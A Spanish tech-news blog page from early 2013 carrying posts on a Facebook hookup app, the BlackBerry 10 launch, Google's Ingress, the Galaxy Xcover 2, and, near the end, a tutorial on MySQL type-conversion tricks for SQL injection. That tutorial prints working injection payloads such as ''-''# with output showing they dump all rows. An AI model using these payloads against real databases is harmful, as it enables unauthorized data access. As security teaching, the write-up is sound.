jueves, 31 de enero de 2013

Descubre a tu pareja sexual en Facebook con una aplicación



 

BangWithFriends.com es una aplicación que facilita los encuentros sexuales con “amigos” en Facebook, ya que acelera el proceso para descubrir si otra persona tiene el mismo interés que el usuario que utiliza esta app.

La aplicación fue creada por tres jóvenes californianos que prefirieron permanecer en el anonimato. “Lo que quiere mucha gente es saltarse todo el rollo e ir directamente al sexo”, dijeron en entrevista para medios locales.

Para poder ingresar a la aplicación, es necesario tener una cuenta de Facebook para acceder a la lista de amigos de los cuales se podrá elegir con el botón “Down to bang” a aquellos con los que el usuario desee tener un encuentro sexual. Si ambos se eligen mutuamente, BangWithFriends.com les notificará a través de un correo electrónico; los eventos que sucedan después quedarán bajo responsabilidad de los dos cibernautas.

Los creadores están trabajando en dos detalles: el refinamiento de búsqueda de “amigos sexuales” para que se pueda elegir a personas con las mismas preferencias sexuales que el usuario y la protección para evitar que menores de edad tengan acceso a la aplicación.

Sin embargo, los usuarios deben tomar en cuenta que esta herramienta no queda exenta de fallas, ya que al acceder deja al descubierto a los amigos que usan la misma app.

De acuerdo con los desarrolladores, el servicio ya cuenta con más de 20 mil usuarios y unió a más de mil parejas en sus primeros cuatro días de lanzamiento.

Fuente: http://www.milenio.com/cdb/doc/notic...4e523f9285cbc6

miércoles, 30 de enero de 2013

BlackBerry presenta oficialmente BlackBerry 10, Blackberry Z10 y Q10


RIM acaba de presentar sus primeros terminales con el recién estrenado sistema operativo BB10. Los modelos, como se esperaba, llevan pantalla táctil y uno de ellos incluye el clásico teclado físico que tan famoso hizo a los dispositivos de RIM. Además, sus pantallas no se escapan de dimensiones en la búsqueda de que manejemos el terminal con total fluidez usando solo nuestro pulgar.


BlackBerry 10 es la gran apuesta de la compañía canadiense para recuperar importancia en un mercado dominado por iOS y Android y en el que otras alternativas como Windows Phone tienen la ventaja de haber llegado antes. Por ello, RIM se plantea la posibilidad de licenciar BlackBerry 10 a terceros para que fabriquen sus propios terminales, aunque, por el momento, confían en su plataforma.


Pero, ¿por qué? Pues porque es un sistema operativo completamente nuevo, con un nuevo sistema de multitarea y controles gestuales, pero sin olvidar las características que hicieron grande la plataforma: facilidad de comunicación y organización y seguridad en las comunicaciones.

Según explicó Thorsten Heins, CEO de RIM, sus teléfonos están dirigidos a la gente que está muy conectada, tanto en su vida personal como en la profesional. En este sentido, destacó la multitarea de BlackBerry 10, que permite ir de una aplicación a otra sin necesidad de pasar por el menú de inicio.

Así pues, si se desliza el dedo desde la parte inferior de la pantalla a la superior, aparecen todas las aplicaciones. Por otro lado, si se recibe un correo, sólo hay que 'arrastrar' desde la parte inferior hacia la derecha, lo que revela un lugar donde poder ver los mensajes recibidos.

BlackBerry Hub, por otro lado, aúna en un único sitio las redes sociales y servicios de mensajería, lo que da la posibilidad de acceder a todas ellas al deslizar el dedo de izquierda a derecha. Hay un gran número de funciones que se pueden realizar desde esta herramienta.


La escritura ha sido rediseñada para que se pueda hacer con un solo dedo. Por este motivo, se han añadido controles gestuales (por ejemplo, para revelar caracteres especiales). De todos modos, lo más sorprendente es el teclado en sí, pues tiene un sistema de sugerencias que parece bastante útil e inteligente (aprende del usuario).

Así, a medida que se escribe en BlackBerry 10, aparecen sugerencias sobre la letra que las contendrá (por ejemplo, si se escribe una H, sobre la O aparecerá 'hola', mientras que sobre la E estará 'hecho'). Sólo hay que 'lanzar' esta palabra hacia el campo de texto para escribirla. Este sistema de predicción reconoce automáticamente el idioma en el que se está escribiendo.


Balance, Messenger y Remember

Otra de las nuevas funciones es BlackBerry Balance, una herramienta que da la opción de cambiar entre modo de trabajo y modo personal (de nuevo, con un sencillo gesto). Cada uno de estos perfiles tendrá su propio fondo de pantalla e, incluso, aplicaciones. A grandes rasgos, se podría decir que es como aunar dos teléfonos en uno.


Por su parte, BlackBerry Messenger ya es capaz de realizar videollamadas. Pero con una interesante novedad: también se puede compartir la pantalla, lo que da muchas opciones adicionales. Por ejemplo, se pueden compartir las fotos que se han tomado, o mostrar presentaciones presentes en uno de los teléfonos.

En cuanto a Remember, es una especie de Evernote nativo con el que se pueden tomar todo tipo de notas y tareas por carpetas... Y que es compatible con Evernote.

Cámara

La cámara incluye un sistema peculiar que, aunque sólo toma una imagen, 'recuerda' lo que había antes y después. De esta forma, es posible elegir la mejor cara de cada una de las personas que aparece en la fotografía. Además, tiene varios filtros y efectos.


Asimismo, gracias a BlackBerry Story Maker se podrán crear vídeos que combinen imágenes, vídeos (lógicamente) y música directamente desde el teléfono; todo ello de forma sencilla y aparentemente muy intuitiva.

BlackBerry Z10

El Blackberry Z10 es un smartphone con pantalla de 4.2 pulgadas, resolución de 1280×768 píxeles para una densidad de 356 ppp. En cuanto al Blackberry Q10, son 3.1 pulgadas (un poco pequeño para el mercado actual) y promete tener la mejor experiencia de escritura en un dispositivo móvil.

Características del BlackBerry Z10
• Pantalla táctil de cristal (no gorilla glass) de 4.2 pulgadas con una densidad de pixeles de 356 PPP y una resolución de 1,280 x 756 pixeles.
• Cámara frontal de 2 mp, graba video HD
• Cámara trasera de 8 mp, graba video full HD
• Puerto micro USB
• Puerto micro HDMI
• Entrada de audio de 3.5 mm
• 16 Gb de memoria interna
• Ranura para tarjeta micro SD (soporta hasta 32 Gb)
• Procesador dual a 1.5 GHz
• Memoria RAM de 2 Gb
• Carcasa trasera de goma
• Compatibilidad con redes LTE
Batería de 1.800 mAh.
Chip NFC.
Conectividad para redes 4G.


El Blackberry Z10 quiere ser el nuevo buque insignia de los canadienses y el referente del nuevo sistema operativo. Un dispositivo de gama alta que quiere convertirse en la tercera alternativa del mercado tras la caída que ha sufrido BlackBerry en el último año y medio.

Blackberry Z10, el símbolo del cambio para BlackBerry

Si nos fijamos en la ficha técnica quizá su doble núcleo a 1,5GHz a algunos les sepa a poco pero BlackBerry ha decidido mantenerse al margen de la batalla de los núcleos y apuesta por una mayor optimización en el software para obtener eficiencia sin necesidad de poner núcleos sobre núcleos.
Eso sí, sólo dos pero viene escoltado con 2GB de RAM para que no nos falte de nada. También cuenta con 16GB de almacenamiento interno que podemos ampliar sin necesidad de apagar el teléfono con una microSD de hasta 32GB.

Las dimensiones del terminal son de 130×65,6×9mm no destaca por su grosor pero entra dentro de lo que podemos considerar como fino. La pantalla tiene un tamaño de 4,2 pulgadas y reconocer hasta cuatro dedos, más que suficiente teniendo en cuenta el tamaño.
Emplea tecnología LCD y cuenta con una resolución de 1280×768 píxeles que se traduce en una densidad de 356 píxeles por pulgada. La batería, nos ofrece 1.800 mAh. Será interesante ver hasta qué punto el sistema operativo la optimiza porque esta cifra en otras plataformas se queda un poco corta con uso intensivo.

En la cámara nos encontramos ocho megapíxeles en la parte trasera y dos en la frontal. La primera nos permite grabar vídeo a 1080p mientras que la segunda, para videoconferencias por BlackBerry Messenger o Skype, lo hará a 720. Eso sí, no se han especificado los detalles del fabricante de la cámara.
En cuanto a redes cuenta con soporte para WiFi, 4G y Bluetooth 4.0. Todo ello sin olvidarse de otros sensores y accesorios como GPS, acelerómetro, giroscopio, sensor de luz ambiental, de proximidad y magnetómetro.

Blackberry Z10, precio y disponibilidad

El precio del nuevo Blackberry Z10 será de unos 519 euros, pero su grueso de ventas será mediante operadoras, sus grandes aliadas de siempre. Ya hay operadoras comprometidas con él, como Vodafone, del que sabemos ya todos los precios.

Su disponibilidad será escalonada: desde mañana en Reino Unido y en febrero en EEUU.

WhatsApp en BlackBerry 10 ya es una realidad

Finalmente, en el magno evento de BlackBerry, los responsables de la plataforma anuncian que Whatsapp en BlackBerry 10 es una realidad, luego de que habían rumores, indicias e incluso palabras de los responsables de la plataforma de mensajería que indicaban que no sería así, pues los usuarios de BB10 no se quedarán si esta importantísima red de mensajería instantánea, que ya forma parte del BlackBerry World.

Whatsapp se ha convertido en una aplicación de vital importancia para los usuarios de smartphones, ya que al ser de multiplataforma permite a usuarios de Android, iPhone, Windows Phone, BlackBerry, Symbian y más, conversar fácilmente a través de datos de internet en una plataforma de mensajería instantánea confiable y con muy buenas cualidades.

Desde hace varias semanas se creía que no veríamos Whatsapp en BlackBerry 10, debido a varias supuestas razones que culpaban tanto al responsable de la plataforma como a la antigua RIM, ahora llamada BlackBerry. Pero finalmente Whatsapp si aterriza en BlackBerry 10 a través de una tan renovada tienda de aplicaciones BlackBerry World que promete contar actualmente con 70 mil aplicaciones, una gran noticia, tomando en cuenta que no un generoso catálogo de software disponible al momento del lanzamiento de una nueva plataforma, como lo es BB10, es un gran impulso para el éxito de ella.


Junto con el nuevo sistema operativo se ha confirmado el lanzamiento de Skype para Blackberry 10. La aplicación más famosa del mundo de llamadas VoIP estará disponible a partir de este momento en la tienda de aplicaciones Blackberry World. Además, junto con Skype también estará disponible Whatsapp para Blackberry 10 pese a que desde la compañía anunciaron a que no habría versión en el nuevo SO móvil.

Contenido

BlackBerry 10 llegará al mercado con una tienda en la que habrá disponibles películas de 8 de las 10 principales productoras y música de las principales discográficas. Pero lo importante es que ya hay más de 70.000 aplicaciones disponibles y cada semana se añaden cientos de nuevos programas.

Según explicó Martyn Mallick, vicepresidente de BlackBerry, esta cifra supone el mayor número de apps con el que una nueva plataforma ha llegado al mercado. Entre ellas hay "miles" de las más utilizadas, como Skype, Whatsapp, Cut the Rope, Jetpack Joyride, Angry Birds, Rdio, Kindle...

En BlackBerry 10, la empresa logró reunir 70,000 aplicaciones (en comparación con las más de 700,000 de Android y iOS) y contrario a lo anunciado antes de la presentación del nuevo sistema operativo, este sí contará con Whatsapp.

El vicepresidente de desarrollo de negocios y alianzas globales, Martyn Mallick, no tardó en presumir alianzas con Amazon Kindle, Facebook, Twitter, Foursquare, LinkedIn, Skype, y en el sector de juegos, GameLoft y Angry Birds.



Cambios en la compañía

Pero eso no es todo. La apuesta por BlackBerry es tan grande que la compañía ha adoptado este nombre. Research In Motion desaparece y 'nace' BlackBerry, una marca única.

Además, la empresa ha presentado sus dos primeros teléfonos BlackBerry 10, BlackBerry Z10 (del que se produjeron filtraciones en diversos momentos antes del lanzamiento y que, de hecho, estuvo disponible en algunas tiendas antes del mismo) y BlackBerry Q10 (con teclado físico, se mantuvo más en secreto).

Los nuevos BlackBerry 10 se podrán comprar a partir de mañana en Reino Unido y del día 5 de febrero en Canadá (Z10. Q10 tardará cinco días más). Al resto de mercados llegarán de forma gradual a partir de febrero.


BlackBerry Q10, el nuevo smartphone con teclado QWERTY

BlackBerry acaba de presentar en Nueva York su nuevo smartphone: Blackberry Q10. Caracterizado por su teclado físico QWERTY, posee una pantalla de 3.1 pulgadas (720x720 píxeles) y un diseño en fibra de vidrio nunca visto en un terminal de estas características. Ademas, desde BlackBerry han asegurado que se trata del smartphone con el que resulta más agradable escribir del mundo. Junto con Z10, también utilizará el nuevo sistema operativo BB10 de la compañía.

Teclado físico y menor pantalla

En esta época de lo táctil sorprende que Blackberry continúe su apuesta por el teclado físico, si bien como ya comentamos anteriormente era una de las principales características de sus terminales anteriores. La Blackberry Q10 lo incluye, al contrario que la Z10 que se basa en una experiencia completamente táctil.
Este teclado físico difiere poco respecto de lo que conocíamos en la gama Bold de antaño. Un teclado QWERTY completo con exactamente la misma distribución y número de teclas, y que de hecho aparenta ser idéntico. De ser así estaremos ante uno de los mejores y más cómodos métodos de entrada en el mundo móvil.
El lado negativo de la introducción del teclado físico es que la pantalla es más pequeña, concretamente de 3.1 pulgadas. Esta característica junto al resto de especificaciones pasamos a describirlas a continuación.

Blackberry Q10, características y especificaciones técnicas

Empezaremos por la pantalla que es realmente curiosa. Se trata de una diagonal de una pantalla capacitiva de 3.1 pulgadas y resolución 720×720 píxeles (330 dpi) que, efectivamente, es cuadrada. A primera vista promete una gran calidad, aunque tendremos que comprobar cómo afecta este formato al sistema operativo y a la experiencia de uso.

El procesador escogido es un Texas Instruments OMAP 4470 de doble núcleo a 1.5 GHz., que también promete un alto rendimiento en parte gracias a la compañía de los 2 GB de memoria RAM adjuntos. De esta forma Blackberry Q10 se posiciona junto a los teléfonos Android de más alta gama al ofrecer esta elevada cantidad de memoria RAM.


• Pantalla de cristal de 3.1 pulgadas con una densidad de pixeles de 356 PPP y una resolución de 720 x 720 pixeles.
• Teclado físico qwerty
• Cámara frontal de 2 mp, graba video HD
• Cámara trasera de 8 mp, graba video full HD
• Puerto micro USB
• Puerto micro HDMI
• Entrada de audio de 3.5 mm
• 16 Gb de memoria interna
• Ranura para tarjeta micro SD (soporta hasta 32 Gb)
• Procesador dual a 1.5 GHz
• Memoria RAM de 2 Gb
• Carcasa trasera de kevlar
• Compatibilidad con redes LTE



BlackBerry Z10 viene con funda ‘Smart Cover’ y varios accesorios

La presentación de BlackBerry 10 nos ha dejado alguna sorpresa, como los accesorios de BlackBerry Z10 presentados para el nuevo buque insignia de la marca, BlackBerry Z10.

Accesorios de BlackBerry Z10 entre los que destaca la funda que nos recuerda a la Smart Cover de los iPad: plegable, protege la pantalla de golpes y arañazos, y sirve también para dar un soporte al dispositivo y que se mantenga erguido. Por lo que hemos podido ver, los habrá en colores rojo, blanco / grisáceo, y negro. A primera vista no parecen demasiado finas por lo que aumentarán el grosor del terminal, ya que no se adhieren mediante imanes, sino mediante una carcasa trasera superpuesta, que si ya de por sí aumenta el grosor, más lo hará si incluimos también la cubierta plegable.

También ha sido presentada un cargador de batería externo, que a buen seguro tendrá un éxito considerable entre los usuarios más activos de su smartphone. Es buen momento para recordar que BlackBerry no se ha subido a la tendencia iniciada por Apple desde 2007, y continuada por cada vez más usuarios como HTC o la propia Google con su Nexus 4, fabricado por LG: fabricar terminales con la batería integrada, y no extraíble. Ello, unido al uso cada vez más intenso de los smartphones, ha provocado que la autonomía sea el talón de Aquiles recurrente para los smartphone.

Sin embargo, en BlackBerry han apostado por la solución más rápida y efectiva a falta de aumentar los mAh de las baterías, y es mediante uno de los accesorios de BlackBerry Z10: ofrecer la posibilidad de tener una segunda batería, y tener un cargador para recargarla en el caso de que nos quedemos sin autonomía. Y que además, podrá cargar simultáneamente teléfono y batería externa.

También han sido presentadas otras fundas como accesorios de BlackBerry Z10, destacando la cubierta icónica que estuvo omnipresente en modelos anteriores de la marca, como los de la saga Bold o la Curve. En cualquier caso, se incluyen tanto modelos en cuero como carcasas de plástico. E incluso se ha incorporado la función de altavoz Bluetooth que puede ser usado como manos libres.


BlackBerry Z10, disponibilidad en Latinoamérica

Ya hemos visto que el Blackberry Z10 es un gran dispositivo. Una gran pantalla táctil que nos ofrece la mejor experiencia posible de BlackBerry 10. Almenos así es como BlackBerry lo ha anunciado. A falta de tener nuestras primeras impresiones con el dispositivo y de poderlo probar, seguro que somos muchos los que ya queremos saber de la disponibilidad del BlackBerry Z10 en Latinoamérica.

Pues según Frank Boulben, Jefe de Marketing de BlackBerry, los primeros países de Latinoamérica en tenerlo serían Venezuela y Colombia. Los habitantes de estos países podrán hacerse con el Z10 a partir del 12 de Marzo. De momento estamos a la espera de saber más disponibilidades para otros países latinoamericanos.

HE AQUÍ UNA RESEÑA DEL EVENTO:


10:19 La empresa muestra un nuevo video de BlackBerry 10

10:18 Alicia Keys habla de los proyectos que ya tiene en su nuevo puesto en BlackBerry. Se dice emocionada con el nombramiento.

10:16 "Tenía una larga relación con BlackBerry, pero noté otros teléfonos más sexies en el gimnasio. Extrañé la manera en la que BB organizaba mi vida", dice Alicia Keys.


10:14 La cantante Alicia Keys se nombrada Directora Global Creativa de BlackBerry.


10:12 "Nuestro éxito vendrá de escuchar a nuestros clientes", dice el CEO de BlackBerry.


10:11 El BlackBerry Z10 estará disponible en EU a partir de marzo un precio de 149 dólares en un contrato a tres años.

10:10 En Estados Unidos, los operadores AT&T, Verizon y T-Mobile anunciarán planes desde hoy para los nuevos modelos de BlackBerry.

10:09 BlackBerry World asegura ser la parada obligatoria para las aplicaciones, juegos, música y video.

10:07 Y, claro, las redes sociales. Facebook, Twitter, Foursquare y LinkedIn también estarán disponibles.

BlackBerry también tiene ‘apps' de SEGA y Electronic Arts.


10:06 El ejecutivo añade que tendrán aplicaciones del Wall Street Journal, New York Times, entre otros medios.

10:05 Amantes del WhatsApp, buenas noticias. "Todos tienen sus apps preferidas. Nosotros las tenemos: Skype, Amazon Kindle, WhatsApp, SAP y Angry Birds", dice Mallick.

10:03 Martyn Mallick, jefe de alianzas globales y desarrollo de negocios, aparece en el escenario.

"Muchos no creían que podíamos crear una BlackBerry con una gran experiencia de contenido", dice Mallick.

"Tenemos más de 70,000 aplicaciones para BlackBerry 10", añade.

10:01 "Firmamos con 8 de los grandes estudios para proveer contenido para BlackBerry World", dice el CEO de BlackBerry. Entre las promesas anunciadas previamente por la firma están el que se podrán encontrar películas al mismo momento en que salen en DVD y series al día siguiente de su emisión.


9:59 ¿Eres creativo? Lanzan el programa BlackBerry Storymaker, que permite contar una historia con distintas fotografías, videos y música.

"Es un nuevo sistema operativo, son nuevas ideas, es una nueva forma de conectarse y compartir. Este es el nuevo BlackBerry", dice Heins


9:54 Otra novedad. Los ejecutivos presentan el programa BlackBerry Remember, que busca juntar el contenido y presentarlo en un solo lugar

"Es el destino para todo tipo de contenido", afirma Bhardwaj

9:50 El BlackBerry Messenger también permitirá controlar o ver la pantalla desde otro aparato con BlackBerry 10.


9:47 ¡La videollamadas llegan al BlackBerry Messenger!


9:46 Novedad. BlackBerry no quiere que la gente utilice dos aparatos, dicen los ejecutivos. Presentan el nuevo programa Balance. que permite cambiar entre dos personalidades: profesional y personal.


9:43 Unos de los nuevos equipos BlackBerry se mueve rápidamente entre inglés, francés y alemán.

"Queremos que los usuarios tengan la misma experiencia en un teclado físico y en un touchscreen", dice Bhardwaj.

9:42 "Si quieres mandar un mensaje rápido, puedes sólo "aventar" la palabra en la pantalla", dice Bhardwaj, quien realiza la demostración con uno de los equipos en el escenario acompañado de Heins, quien en cada oportunidad expresa "¡Wow!"


9:41 "Buscamos ser la mejor experiencia al utilizar un teclado, punto", dice el CEO de la renombrada BlackBerry

9:40 Bhardwaj habla de contactos. Si seleccionas a una persona, puedes ver información sobre ella, reuniones pasadas y conexiones a redes sociales.

Heins afirma que para tener toda esa información debías antes ir a aplicaciones separadas, pero en BlackBerry 10 está todo en un lugar.


9:39 El sistema permite moverse de contenido al BlackBerry Hub, donde se manejan mensajes y comunicaciones, de una forma sencilla.

9:37 "No se trata de salir y entrar de las aplicaciones para volver al botón de inicio. Se trata de que todo fluya", dice Bhardwaj.

9:36 Bhardwaj afirma que los equipos son multitarea. "Puedes abrir y minimizar aplicaciones y todo sigue funcionando", dice.


9:35 Demostrarán como se usan los teléfonos. Aparece en el escenario Vivek Bhardwaj, jefe de portafolio de software para BlackBerry.

9:33 El BlackBerry Q10 tiene un teclado físico. "Sabemos que hay muchos usuarios que utilizan las teclas físicas, los escuchamos fuerte y claro", dice Heins.


9:31 El primer smartphone es el BlackBerry Z, que tiene pantalla táctil, y el Q10, que es parecido al ya existente modelo Bold.

9:29 Cuenta regresiva y... ¡BlackBerry presenta al mundo dos nuevos equipos!

9:28 "Puedes crear, consumir, compartir, y actuar", asegura el CEO de BlackBerry.

9:28 "Hemos reinventado esta compañía y queremos reflejarlo en nuestra marca", dice el ejecutivo.

Una llamada o un mensaje, todo está a la mano en BlackBerry 10, añade Heins

9:27 ¡Sorpresa! La empresa Research in Motion cambiará su nombre a BlackBerry, informa Heins.

"Desde ahora somos BlackBerry en cualquier lugar del mundo", dice el CEO.

9:26 BlackBerry asegura haber construido sólidas relaciones con los operadores telefónicos.


9:25 Thorsten Heins asegura que BlackBerry 10 está enfocado en contenido y aplicaciones.

9:24 Hemos creado una plataforma que trabaja con autos o el sistema de salud. Esa es la promesa de la plataforma BB10, dice el ejecutivo.

9:22 "Los usuarios de BB10 están hiperconectados, quieren tener las cosas hechas y realizan muchas tareas", dice Heins, quien habla mientras camina de un lado al otro del escenario en Nueva York.

9:20 "Muchas personas han jugado un rol hasta este momento. Gracias a los desarrolladores, operadores y comunidades donde trabajamos", añade el CEO de la compañía.

9:19 "La innovación está en el corazón de RIM", dice Heins

9:18 Thorsten Heins entra al escenario y saluda al público presente en el evento y a quienes lo siguen a través de la red.


9:15 RIM inicia su evento con la transmisión de videos de personas que han utilizado BlackBerry 10.

9:10 La espera terminó, el CEO de Research In Motion (RIM), Thorsten Heins, presenta este miércoles sus nuevos smartphones que funcionan con el nuevo sistema BlackBerry 10.

RIM lleva a cabo eventos simultáneos para la presentación del BlackBerry 10 en Londres, Dubái y Johanesburgo




FUENTE 

martes, 29 de enero de 2013

El Misterioso Juego de Google


Ingress solo funciona con móviles Android

“¿Juegas el sábado al Ingress?” . Así podría comenzar la conversación entre dos jugadores de la misteriosa creación de Google. La media de espera para tener una invitación es de un mes y solo funciona con Android. Sin embargo, la sesión de cada miembro suele ser superior a una hora.

Ingress nació a finales de 2012 con un argumento entre futurista y conspiranoico. Un grupo de científicos asegura haber descubierto una nueva forma de energía, pero solo se encuentra en lugares que son significativos para un grupo relevante de personas. Este supuesto descubrimiento influye en la manera de pensar de los humanos, que a su vez se han dividido entre los Iluminados, que pretenden sacar el mejor provecho de esta energía, sienten gran atracción por ella, y la Resistencia, que pretende protegerla porque creen que es básica para la humanidad.


Hasta ahí se podría definir como un juego de realidad aumentada más, con tintes de rol. Sin embargo, no todo el mundo puede jugar y no está claro por qué Google lo ha creado. Tampoco se sabe cuál es el censo de miembros activos. John Hanke, vicepresidente de Google y responsable de Niantic Labs, la división del buscador dedicada a este juego, solo indica que el 50% proviene de Estados Unidos. En el resto del mundo registran actividad notable en Reino Unido, Alemania, Francia e Italia. En España es algo menos conocido. También aseguran tener jugadores en China, Japón y algunos puntos de África.

La mecánica es sencilla. Salir a la calle con el móvil, abrir la aplicación en busca de las fuentes de esta misteriosa energía. A medida que se recolectan objetos se conquistan territorios y se consiguen aliados. La batalla es global y se pueden comunicar entre miembros del mismo equipo para plantear una estrategia.

Se cumple así uno de los sueños de cualquier negocio, ser global y local a la vez. “El campo de batalla es limitado, pero muy amplio. Todo el Planeta”, indica Hanke. Confiesa que la motivación de Google es estar a la última en juegos: “Por ahora han explotado los juegos sociales, pero los juegos en móviles no han estallado todavía. Habrá un momento en que lo hagan y es un campo que queremos liderar”.

Aún así Google tendría que sacar algún tipo de beneficio de esta aventura... “Nos sirve, por ejemplo, para experimentar con nuevos soportes publicitarios. Tenemos anuncios de películas, de locales como los Duane Reade de Nueva York y podemos hacer ofertas basadas en la localización”, expone Hanke. De momento, esta es la única recompensa tangible, ofertas.

Google pide acceso a la información de GPS del usuario, a la foto que envía dentro de la aplicación por lo que quedan muchos cabos sueltos en este granero de datos. Hanke insiste en que quieren que se salga a la calle, que los usuarios se muevan, que no estén en casa. “Puede ayudar a descubrir monumentos, locales y sitios que no conocen”, subraya, pero se niega a explicar el uso que tendrán estos datos.

Por ejemplo, en la página de ayuda, dan pistas para conseguir más puntos descubriendo portales (como llaman a los lugares físicos de interés): “No tenemos fotos de muchas librerías, museos, oficinas de correo y estaciones de bomberos. Esperamos tenerlas pronto”.

Es fácil deducir que estas imágenes se podrán usar para enriquecer StreetView, un servicio que muestra las calles de ciudades a través de fotos y que últimamente ha añadido interiores de tiendas y servicios. Al mismo tiempo, se pueden adivinar algunos aspectos que pueden ser interesantes para Google, casi todos enfocados en sus mapas. Google podrá mejorar la estimación que hace en Google Maps cuando se le pide el tiempo para ir andando de un lugar a otro. Incluso añadir si hay nuevos locales, puntos de interés emergente, locales de moda, obras...

No sería la primera vez que emprenden un proyecto con una finalidad muy distinta a la declarada. Crearon un sistema de verificación para comentarios en blog, los captcha, para evitar el spam, que les sirvió para mejorar la agudeza de su tecnología para reconocer textos. Esto fue básico para el lanzamiento de Google Books con un gran número de títulos digitalizados. También crearon un contestador automático que resolvía dudas. ¿No era absurdo? No si querían tener un gran espectro de acentos, tonos y voces para poder ofrecer hoy órdenes de voz y aplicaciones de dictado.

Tampoco es casualidad que sea Hanke quien lidera este proyecto. Se le considera el gurú detrás Google Earth, Google Maps y StreetView. Se incorporó a Google en 2004, cuando compraron Keyhole, de la que era consejero delegado, dedicada a la cartografía.

El juego cuenta con un complemento adicional, la página web Niantic Project en la que se dan pistas e indicaciones, se habla de algunos personajes. Cada mes se plantea una misión, día a día se puede consultar la evolución. Noviembre, diciembre, enero, así hasta... “Tenemos asegurado el guion durante al menos un año más”, apunta el directivo. De acuerdo, pero si el juego era móvil, ¿por qué crean una página web pensada para el ordenador? “Para hacerlo más rico. Así conseguimos potenciar el aspecto emotivo, la fuerza de los personajes”, explica Hanke. Pero puede ser algo mucho más rico, se puede saber si es demasiado fácil o difícil, si necesitan este apoyo, si un tipo de argumento agrada más que otro... Pero también si el usuario de Android entra con frecuencia en su PC, desde dónde y de qué tipo.

Google ha conseguido así un ejército de exploradores urbanos voluntarios, todos dentro de su ecosistema. “No descartamos de manera tajante u oficial salir en iOS pero lo natural, por lógica y facilidad de desarrollo era apostar por Android”, concluye. Hanke aclara que la espera de un mes no es para crear expectación, sino para asegurar una experiencia fluida y asegurar que no se caen los servidores de este experimento.


Niantic Labs, la división de Google dedicada a estos experimentos, ya trabaja en su próximo lanzamiento. 

 
Una aplicación Field Trip que por ahora solo funciona en Estados Unidos y Reino Unido y únicamente si se usa en grupo. Lo definen como "una guía de las cosas chulas que te rodean".



Fuente

lunes, 28 de enero de 2013

Samsung renueva su Android resistente con el Galaxy Xcover 2




La resistencia al polvo o el agua se está empezando a colar en los smartphones de gama alta, pero este tipo de características suelen ser más habituales en modelos de corte más sencillo. Es el caso del Galaxy Xcover 2, la nueva apuesta de Samsung para el público más aventurero.

Sucesor directo del primer Galaxy Xcover, cuenta con la habitual certificación IP67, que garantiza su supervivencia durante inmersiones en agua hasta un metro de profundidad durante media hora. Para proteger la batería, y tal ya como sucedía con otros teléfonos como el Nokia 3720 Classic, el cierre de la tapa trasera está asegurado con un tornillo.


En su nota de prensa, Samsung destaca otros puntos como la batería de 1.700 mAh, capaz de proporcionar hasta 570 horas de autonomía en espera. La firma surcoreana también incluye en este terminal una aplicación preinstalada de entrenamiento personal, así como mapas de Google ya descargados para su consulta sin conexión.

Por el resto, este Galaxy Xcover 2 presenta una hoja de especificaciones bastante similar a la del Galaxy S III mini, incluyendo el sistema operativo Android 4.1, una pantalla de 4 pulgadas y 480 x 800 píxeles, un procesador de doble núcleo a 1 GHz, 1 GB de RAM y 4 GB de almacenamiento integrado ampliable mediante tarjetas microSD.

También cuenta con una cámara frontal de resolución VGA y un captor trasero de 5 megapíxeles con flash de tipo LED (que también puede funcionar como linterna), grabación de vídeo a 720p y un botón dedicado en uno de los laterales del equipo. Samsung no ha proporcionado datos sobre su precio ni su fecha de disponibilidad.

Más información acerca de esta noticia:

- Nota de prensa de Samsung

FUENTE

Abusando de la conversión de tipos para pequeñas inyecciones en MySQL

Leyendo el blog de Koto (Krzysztof Kotowicz) encontré un pequeño truco que puede ayudarnos a explotar inyecciones SQL en bases de datos MySQL. Primero vamos a ver el comportamiento del RBDMS:


mysql> desc t;


+-------+-------------+------+-----+---------+-------+
| Field | Type        | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| name  | varchar(20) | YES  |     | NULL    |       |
| num   | int(11)     | YES  |     | NULL    |       |
+-------+-------------+------+-----+---------+-------+
 

2 rows in set (0.11 sec)

mysql> select * from t;

 

+--------+------+
| name   | num  |
+--------+------+
| nazwa  |    3 |
| second |    4 |
+--------+------+
 

2 rows in set (0.00 sec)
 

mysql> select * from t where name='';
 

Empty set (0.00 sec)
 

mysql> select * from t where name=''-'';
 

+--------+------+
| name   | num  |
+--------+------+
| nazwa  |    3 |
| second |    4 |
+--------+------+
 

2 rows in set, 2 warnings (0.00 sec)

¿Qué es lo que ha pasado? Vamos a investigar un poco:


mysql> show warnings;


+---------+------+--------------------------------------------+
| Level   | Code | Message                                    |
+---------+------+--------------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'nazwa'  |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'second' |
+---------+------+--------------------------------------------+
 


2 rows in set (0.00 sec)

El operador menos "-" utilizado en el string la convierte a DOUBLE, un valor numérico. ¿Cual es el resultado de esta sentencia?:

mysql> select ''-'';


+-------+
| ''-'' |
+-------+
|     0 |
+-------+


Para cada registro la columna 'name' es comparada a 0, lo cual provoca otro tipo de conversión y, con un warning, el valor de cada uno de ellos es efectivamente 0, lo cual satisface la condición WHERE (0 = ''-'').

Ahora, ¿cómo podemos abusar de esta peculiaridad? Imagina que tienes un juego de caracteres limitado (por ejemplo, sin espacios en blanco, sin signo de igualdad, sin paréntesis, sin letras) o la longitud disponible es muy limitada. La query vulnerable es SELECT secret FROM table WHERE secret='$injection' AND another>5 AND ... y necesita devolver al menos algún valor, pero no conoces ninguno en la columna secret (la cual no es fácilmente enumerable). Un payload tan simple como '-''# convertirá la query a:

SELECT secret FROM table WHERE fld=''-''# AND .....

y devolverá todos los registros (a parte de los que coincidan con /^-?[0-9]/).

Además puedes usar el mismo truco con ''+'', ''&'',''^'' y ''*''. Ten en cuenta:

mysql> select 1 from dual where 'something' = ''/'';


Empty set, 1 warning (0.00 sec)

mysql> select 1 from dual where 'something' = ''/1;


+---+
| 1 |
+---+
| 1 |
+---+
 

1 row in set, 1 warning (0.00 sec)

Otro truco sería comparar simplemente una columna de cadena con ''-0:

mysql> select * from t where name=''-0;


+--------+------+
| name   | num  |
+--------+------+
| nazwa  |    3 |
| second |    4 |
+--------+------+


2 rows in set, 2 warnings (0.00 sec)


Todas estas sentencias SQL fueron probadas en MySQL 5.5 y 5.1, aunque debería funcionar en versiones anteriores también.

Y eso es todo amigos. Para más técnicas de inyección SQL te recomiendo la referencia de inyecciones SQL de Roberto Salgado. Me ayudó en numerosas ocasiones y es en mi opinión es una las mejores sobre SQLi que se han hecho nunca.




Fuente

Otra red social: Heello, la nueva competencia de Twitter

